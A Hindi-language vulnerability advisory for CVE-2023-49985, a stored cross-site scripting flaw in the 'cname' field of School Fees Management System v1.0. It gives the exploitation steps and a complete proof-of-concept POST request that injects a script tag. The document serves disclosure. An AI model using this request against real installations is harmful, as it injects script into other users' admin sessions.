
School Fees Management System v1.0 - "new_class" पर "cname" पैरामीटर में क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता
विवरण: School Fees Management System v1.0 के "new_class" घटक में एक क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता, हमलावरों को cname पैरामीटर में इंजेक्ट किए गए क्राफ्टेड पेलोड के माध्यम से मनमाना वेब स्क्रिप्ट या HTML निष्पादित करने की अनुमति देती है।
संवेदनशील उत्पाद संस्करण: School Fees Management System v1.0
CVE लेखक: Geraldo Alcântara
दिनांक: 28/11/2023
पुष्टि की गई: 19/12/2023
CVE: CVE-2023-49985
परीक्षण किया गया: Windows
भेद्यता का शोषण करने के लिए, उपयुक्त अनुमतियों वाले उपयोगकर्ता को "/ci_fms/admin/management/class" पृष्ठ तक पहुँचना होगा। इस पृष्ठ पर, उपयोगकर्ता को या तो किसी मौजूदा कक्षा को संपादित करना होगा या एक नई कक्षा जोड़नी होगी। इस प्रक्रिया के दौरान दुर्भावनापूर्ण पेलोड को "cname" पैरामीटर में डाला जाना आवश्यक है।
POST /ci_fms/admin/action/new_class HTTP/1.1
Host: 192.168.68.148
Content-Length: 273
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.68.148
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAbJT9XS9eFLU53MR
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.68.148/ci_fms/admin/management/class
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ci_session=gdoj5tr7rsf7ci5o9rpr0rh5eni2r6an
Connection: close
------WebKitFormBoundaryAbJT9XS9eFLU53MR
Content-Disposition: form-data; name="cname"
<script>alert(document.domain)</script>
------WebKitFormBoundaryAbJT9XS9eFLU53MR
Content-Disposition: form-data; name="cfees"
12,000
------WebKitFormBoundaryAbJT9XS9eFLU53MR--
खोजकर्ता/श्रेय:
Geraldo Alcântara